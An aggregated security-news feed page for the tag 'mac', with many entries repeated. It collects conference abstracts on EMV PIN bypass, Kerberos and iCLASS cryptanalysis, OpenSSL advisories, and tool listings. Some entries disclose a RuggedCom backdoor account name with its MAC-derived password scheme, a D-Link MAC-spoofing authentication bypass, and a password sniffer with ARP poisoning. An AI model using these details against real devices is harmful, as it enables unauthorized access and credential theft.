«
Expand/Collapse
170 items tagged "mac"
Related tags:
mac check [+],
mac addresses [+],
device [+],
bluetooth [+],
Wireless [+],
vulnerability [+],
tar [+],
source destination [+],
source [+],
mptcp [+],
ip packets [+],
destination ip address [+],
destination [+],
BackTrack [+],
mac os [+],
linux [+],
lan [+],
sig [+],
security [+],
padding [+],
openssl [+],
mandriva linux [+],
mac address list [+],
implementation [+],
harald scan [+],
authentication [+],
Newbie [+],
Area [+],
windows [+],
threaded [+],
tcp ports [+],
tcp [+],
python [+],
protocol [+],
port scanner [+],
network [+],
multi [+],
microsoft [+],
chaos communication congress [+],
wpa tkip [+],
winpcap based [+],
tar gz [+],
sophos [+],
socks [+],
service [+],
partition [+],
open ports [+],
network interface card [+],
macs [+],
mac osx [+],
lan adapters [+],
kismet [+],
intercepter [+],
d link [+],
cisco aironet [+],
bssid [+],
arp requests [+],
arp poisoning [+],
apple mac os x [+],
apple mac os [+],
Support [+],
Hardware [+],
General [+],
wol e [+],
wol [+],
wep [+],
wake [+],
utility [+],
usa [+],
tls server [+],
spoof [+],
sans [+],
ruggedcom [+],
ros [+],
request packet [+],
reply packets [+],
random value [+],
presp [+],
partition tables [+],
packet [+],
monocle [+],
linux security [+],
linux kernels [+],
ldm [+],
lan hacking [+],
kismet wireless [+],
ipv [+],
invalid parameters [+],
information disclosure [+],
information [+],
ifconfig [+],
idefense security advisory [+],
idefense [+],
icmp echo request [+],
host [+],
hidemac [+],
file format converter [+],
fil [+],
excel [+],
ettercap [+],
elliptic curves [+],
discovery [+],
detection [+],
denial of service [+],
denial [+],
debian [+],
dd wrt [+],
check [+],
bypass [+],
bug [+],
buffer overflow bug [+],
backdoor [+],
arp request [+],
arbitrary code execution [+],
apple mac [+],
apple computers [+],
airodump [+],
adsl router [+],
adresse mac [+],
Technologies [+],
Software [+],
12 months [+],
wpa key [+],
wpa [+],
wlan [+],
wepkey [+],
unix variants [+],
tmac [+],
tkip aes [+],
technitium [+],
tcp implementations [+],
tablet [+],
source release [+],
source mac address [+],
smb [+],
set [+],
security advisory [+],
secunia [+],
scurit [+],
s system [+],
rtf [+],
router [+],
root [+],
rlc [+],
rachel engel scott stender [+],
python code [+],
protocol type [+],
protocol stacks [+],
protocol designers [+],
protocol address [+],
problem [+],
poc [+],
packet data services [+],
office [+],
nmb [+],
nic [+],
network interface card nic [+],
mon [+],
memory corruption [+],
media access control [+],
master browser [+],
malware [+],
mac linux [+],
mac font [+],
mac address changer [+],
local area network [+],
linux windows [+],
linux 64bit [+],
link [+],
ldt [+],
kernel [+],
kerberos protocol [+],
kerberos [+],
ivs [+],
integer data types [+],
incrypt [+],
iclass [+],
huawei [+],
hid [+],
header [+],
harald welte [+],
freetype [+],
free anti virus [+],
filter [+],
fabian yamaguchi [+],
exploit [+],
echo life [+],
design [+],
cryptographic algorithm [+],
cryptanalysis [+],
computer [+],
communication [+],
code [+],
cl [+],
changer [+],
brad hill [+],
beta [+],
bash program [+],
based buffer overflow [+],
authentication request [+],
authentication protocol [+],
attacker [+],
arp [+],
application crash [+],
anti [+],
advisory [+],
adresse [+],
access [+],
xxxx [+],
xorg [+],
xor [+],
xcode [+],
x update [+],
x snow [+],
x recovery [+],
x malware [+],
x lion [+],
x compact [+],
wrap up [+],
world [+],
working [+],
wireshark [+],
wireless mice [+],
wireless keyboards [+],
wireless cards [+],
wifi [+],
web habits [+],
wearable [+],
weapon of choice [+],
way [+],
waiting [+],
w lt [+],
vmware [+],
virus [+],
vipr [+],
video [+],
using modern technology [+],
users [+],
use [+],
usb [+],
trojan [+],
throughput [+],
thanks in advance [+],
textbytesatom [+],
ted [+],
targets [+],
tablet computer [+],
sudo [+],
stuxnet [+],
strength security [+],
steven j. murdoch tags [+],
steve [+],
station [+],
static ip [+],
static [+],
standby mode [+],
stack buffer [+],
stable [+],
source mac [+],
something [+],
software windows [+],
software defined radio [+],
snow leopard [+],
sms text message [+],
smart card payments [+],
side [+],
session features [+],
service vulnerability [+],
server [+],
serious [+],
security holes [+],
securitng [+],
screen [+],
safer use [+],
safeguard [+],
routers [+],
rom [+],
robert [+],
retired [+],
response packet [+],
replacement lcd [+],
renewal interval [+],
remote [+],
recruit [+],
recreating [+],
recovery partition [+],
radio [+],
quot [+],
pwn [+],
pumpkin [+],
pt 01 [+],
protection [+],
project [+],
powerpoint [+],
power symbol [+],
ports [+],
port [+],
point [+],
plugs [+],
platform [+],
planning [+],
pinhead [+],
pin [+],
physical memory [+],
phone [+],
phillip torrone [+],
pgp users [+],
pgp [+],
pfragments [+],
personal area network [+],
penguin [+],
pc. [+],
parameters [+],
parameter [+],
para [+],
osx [+],
os x [+],
omg [+],
old macs [+],
old [+],
offset [+],
office router [+],
number [+],
network input [+],
network admin [+],
neat piece [+],
nbsp nbsp nbsp nbsp nbsp [+],
nbsp [+],
n draft [+],
my handshake [+],
multiple buffer overflow [+],
mike doell [+],
midi mapping [+],
midi [+],
microsoft powerpoint viewer [+],
microsoft office [+],
michael test [+],
mic key [+],
max msp [+],
max [+],
mario [+],
makeover [+],
make [+],
mad scientist [+],
macintosh liberation army [+],
macbook [+],
mac supports [+],
mac spoofing [+],
mac side [+],
mac se [+],
mac problem [+],
mac plus [+],
mac pin [+],
mac os x update [+],
mac os x security [+],
mac os x apple [+],
mac operating systems [+],
mac malware [+],
mac layer [+],
mac iici [+],
mac emulator [+],
mac emulation [+],
mac computer users [+],
mac clone [+],
mac chat [+],
mac address filters [+],
mac address filtering [+],
locked [+],
liu [+],
list [+],
linux wireless [+],
linux development [+],
limor fried [+],
limor [+],
limitation [+],
leopard [+],
layer 2 [+],
layer [+],
launches [+],
laser cutter [+],
laser [+],
kit [+],
kernel panic [+],
jsp [+],
jonathan rosenberg [+],
jboss [+],
java security holes [+],
java [+],
jake howe [+],
ipod [+],
ipads [+],
ipad [+],
ip ports [+],
ip list [+],
image [+],
home [+],
hero [+],
here [+],
help [+],
handshake problem [+],
halloween props [+],
halloween [+],
hacking tool [+],
hacking [+],
hacker [+],
hack contest [+],
guitar hero [+],
guitar [+],
gps satellites [+],
google [+],
gawthrop [+],
free anti virus software [+],
free [+],
fpga [+],
font format [+],
flashback [+],
fios [+],
finland [+],
file [+],
fiber optics [+],
ff ff ff [+],
fashion [+],
exploits [+],
experiment [+],
evil [+],
everything [+],
europe [+],
ethercap [+],
epilog laser [+],
epilog [+],
enterprise media [+],
encryption [+],
emv [+],
emulator [+],
echo on [+],
e ip [+],
dst [+],
don [+],
dockstar [+],
dna finland [+],
disk [+],
direct [+],
direcciones mac [+],
dhcp [+],
development [+],
developing linux applications [+],
dell optiplex gx270 [+],
dell optiplex [+],
default device [+],
debutant [+],
day [+],
darknet [+],
darklords [+],
d link router [+],
cyber criminals [+],
cutter [+],
customizable messages [+],
crt screen [+],
cross site scripting [+],
cross [+],
critical security [+],
crimeware [+],
credit card fraud [+],
creation functions [+],
cracker [+],
corrosive properties [+],
controller [+],
connected computer [+],
configuring [+],
computer boots [+],
complete security [+],
command execution [+],
command [+],
code execution [+],
cms [+],
client [+],
click [+],
classic [+],
cisco ime [+],
cisco [+],
chopchop [+],
chip [+],
charlie miller [+],
change [+],
card [+],
cap [+],
canada [+],
c cf [+],
business strength [+],
built [+],
buffer overflow vulnerability [+],
bradley gawthrop [+],
booting [+],
bluetoothdialup [+],
bluescripts [+],
big [+],
belkin router [+],
becoming [+],
b trojan [+],
auth [+],
association [+],
assignement [+],
arm processor [+],
apple server [+],
apple safari [+],
apple platform [+],
anti virus software [+],
android [+],
air traffic control [+],
aime [+],
address [+],
access points [+],
Tools [+],
Soporte [+],
Skype [+],
ExploitsVulnerabilities [+],
Espace [+],
Discussion [+],
Angolo [+],
68k macintosh [+],
4ghz [+],
1b channel [+],
mac address [+],
read [+],
privilege escalation vulnerability [+],
mac os x [+],
linux kernel [+],
hacks [+],
apple [+],
sniffer [+],
local privilege escalation [+],
hfs [+],
asc [+]
-
-
12:01
»
Hack a Day
A few months ago [Antti Palosaari] discovered cheap USB TV tuners could be used as a software-defined radio. Since then, we’ve seen these TV tuners receive signals from GPS satellites and even the signals between air traffic control and passenger aircraft. Like everything cool, Mac support for these drivers is slightly terrible so [hpux735] wrote his own [...]
-
-
21:40
»
SecDocs
Authors:
Steven J. Murdoch Tags:
bank smart card Event:
Chaos Communication Congress 27th (27C3) 2010 Abstract: EMV is the dominant protocol used for smart card payments worldwide, with over 730 million cards in circulation. Known to bank customers as “Chip and PIN”, it is used in Europe; it is being introduced in Canada; and there is pressure from banks to introduce it in the USA too. EMV secures credit and debit card transactions by authenticating both the card and the customer presenting it through a combination of cryptographic authentication codes, digital signatures, and the entry of a PIN. In this paper we describe and demonstrate a protocol flaw which allows criminals to use a genuine card to make a payment without knowing the card’s PIN, and to remain undetected even when the merchant has an online connection to the banking network. The fraudster performs a man-in-the-middle attack to trick the terminal into believing the PIN verified correctly, while telling the issuing bank that no PIN was entered at all. The paper considers how the flaws arose, why they remained unknown despite EMV’s wide deployment for the best part of a decade, and how they might be fixed. Because we have found and validated a practical attack against the core functionality of EMV, we conclude that the protocol is broken. This failure is significant in the field of protocol design, and also has important public policy implications, in light of growing reports of fraud on stolen EMV cards. Frequently, banks deny such fraud victims a refund, asserting that a card cannot be used without the correct PIN, and concluding that the customer must be grossly negligent or lying. Our attack can explain a number of these cases, and exposes the need for further research to bridge the gap between the theoretical and practical security of bank payment systems. Smart cards have gradually replaced magnetic strip cards for point-of-sale and ATM transactions in many countries. The leading system, EMV (named after Europay, MasterCard, and Visa), has been deployed throughout most of Europe, and is currently being rolled out in Canada. As of early 2008, there were over 730 million EMV compliant smart cards in circulation worldwide. In EMV, customers authorize a credit or debit card transaction by inserting their card and entering a PIN into a point-of-sale terminal; the PIN is typically verified by the smart card chip, which is in turn authenticated to the terminal by a digital certificate. The transaction details are also authenticated by a cryptographic message authentication code (MAC), using a symmetric key shared between the payment card and the bank that issued the card to the customer (the issuer). EMV was heavily promoted under the “Chip and PIN” brand during its national rollout in the UK. The technology was advertised as a solution to increasing card fraud: a chip to prevent card counterfeiting, and a PIN to prevent abuse of stolen cards. Since its introduction in the UK the fraud landscape has changed significantly: lost and stolen card fraud is down, and counterfeit card fraud experienced a two year lull. But no type of fraud has been eliminated, and the overall fraud levels have actually risen (see Figure 1). The likely explanation for this is that EMV has simply moved fraud, not eliminated it. One goal of EMV was to externalise the costs of dispute from the issuing bank, in that if a disputed transaction has been authorised by a manuscript signature, it would be charged to the merchant, while if it had been authorised by a PIN then it would be charged to the customer. The net effect is that the banking industry, which was responsible for the design of the system, carries less liability for the fraud. The industry describes this as a ‘liability shift’. In the past few years, the UK media have reported numerous cases where cardholders’ complaints have been rejected by their bank and by government-approved mediators such as the Financial Ombudsman Service, using stock excuses such as ‘Your card was CHIP read and a PIN was used so you must have been negligent.’ Interestingly, an increasing number of complaints from believable witnesses indicate that their EMV cards were fraudulently used shortly after being stolen, despite there having been no possibility that the thief could have learned the PIN. In this paper, we describe a potential explanation. We have demonstrated how criminals can use stolen “Chip and PIN” (EMV) smart cards without knowing the PIN. Since “verified by PIN” – the essence of the system – does not work, we declare the Chip and PIN system to be broken.
-
-
10:22
»
Packet Storm Security Exploits
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
10:22
»
Packet Storm Security Recent Files
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
10:22
»
Packet Storm Security Misc. Files
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
-
21:32
»
SecDocs
Authors:
Harald Welte Tags:
GSM phone Event:
Chaos Communication Congress 28th (28C3) 2011 Abstract: Almost everyone uses the packet oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and Wifi, not many members of the hacker commnunity are familiar with the actual protocol stack for those services. This talk is aimed to give an in-depth explanation how the lower layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP, GTP For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP, RANAP
-
21:32
»
SecDocs
Authors:
Harald Welte Tags:
GSM phone Event:
Chaos Communication Congress 28th (28C3) 2011 Abstract: Almost everyone uses the packet oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and Wifi, not many members of the hacker commnunity are familiar with the actual protocol stack for those services. This talk is aimed to give an in-depth explanation how the lower layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP, GTP For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP, RANAP
-
-
21:27
»
Packet Storm Security Exploits
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
21:27
»
Packet Storm Security Recent Files
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
21:27
»
Packet Storm Security Misc. Files
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
-
11:01
»
Hack a Day
[Bradley Gawthrop's] biggest gripe about his laser cutter is the lack of Mac support. We don’t think we’d have any gripes if we owned one of these (yeah, that’s a lie…) but we can understand his second biggest issue which is the inability to see the work piece once it’s inside the machine. He figured [...]
-
-
17:10
»
Packet Storm Security Recent Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is a heart of the security of HID's iCLASS systems, its security has not been evaluated yet since the specification has not been open to public. In this paper, they reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, we show that the secret key of size 64 bits can be recovered using only 218 MAC queries if the attacker can request MAC for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 242 to recover the secret key.
-
17:10
»
Packet Storm Security Misc. Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is a heart of the security of HID's iCLASS systems, its security has not been evaluated yet since the specification has not been open to public. In this paper, they reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, we show that the secret key of size 64 bits can be recovered using only 218 MAC queries if the attacker can request MAC for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 242 to recover the secret key.
-
-
15:24
»
Packet Storm Security Recent Files
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
15:24
»
Packet Storm Security Tools
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
15:24
»
Packet Storm Security Misc. Files
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
-
18:59
»
Packet Storm Security Advisories
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
18:59
»
Packet Storm Security Recent Files
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
18:59
»
Packet Storm Security Misc. Files
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
-
13:25
»
Hack a Day
[Ricard Dias] wrote in to tell us about his guide for developing Linux applications on a Mac. He really enjoys the development environment provided by XCode, and it doesn’t take much to make it work as an all-in-one solution for Linux development. The real trick here is the use of SSH to access a Linux [...]
-
-
6:04
»
Packet Storm Security Recent Files
Technitium MAC Address Changer allows you to change Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.
-
6:04
»
Packet Storm Security Misc. Files
Technitium MAC Address Changer allows you to change Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.
-
-
16:48
»
Packet Storm Security Recent Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
16:48
»
Packet Storm Security Tools
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
16:48
»
Packet Storm Security Misc. Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
-
10:17
»
Packet Storm Security Recent Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Tools
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Tools
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Misc. Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
-
15:01
»
Hack a Day
As a new recruit to the 68k Macintosh Liberation Army, [dougg3] is really showing off his hardware hacking ability. He came up with a replacement ROM SIMM for his Mac IIci and made it play the Mario theme on boot instead of the normal chimes. Swapping out the ROM in these old macs isn’t an [...]
-
11:52
»
SecDocs
Authors:
Brad Hill Rachel Engel Scott Stender Tags:
Kerberos Event:
Black Hat USA 2010 Abstract: The Kerberos protocol is provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not make a magically secure a network. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.
-
11:52
»
SecDocs
Authors:
Brad Hill Rachel Engel Scott Stender Tags:
Kerberos Event:
Black Hat USA 2010 Abstract: The Kerberos protocol is provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not make a magically secure a network. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.
-
-
18:01
»
Packet Storm Security Recent Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Tools
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Tools
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Misc. Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
-
14:05
»
Hack a Day
[Steve] over at Big Mess O’ Wires has never been so happy to see the “Sad Mac” icon. A little over a month ago, he decided to take on the task of building his own Mac clone using modern technology. Not to be confused with Mac emulation on modern hardware, he is attempting to build [...]
-
-
15:00
»
Sophos security news
Anti-Virus software for Mac delivers complete security and support for business and home users of popular Mac operating systems
-
-
9:01
»
Hack a Day
When [Liu] decided he wanted one of the new iPads, rather than fork out the cash he decided to build his own tablet Mac. His creation functions just as you would expect any tablet PC with some nice extra features such as running on Windows XP for any of you Microsoft lovers. [Lui’s] tablet apparently [...]
-
-
23:28
»
Sophos product advisories
If you install SafeGuard Disk Encryption for Mac 5.50.1 on Mac OS X 10.7 (Lion), Mac OS X 10.7 will no longer start. Instead the computer boots up into the Mac OS X Recovery partition.
-
-
9:05
»
Hack a Day
Here’s a way to gain control of your projects using an Android device. Bluescripts is a free app available in the Android market that makes it a bit easier to make interfaces to send customizable messages. If you have a Bluetooth receiver in your project, connecting to it is as easy as putting the MAC [...]
-
-
6:06
»
Hack a Day
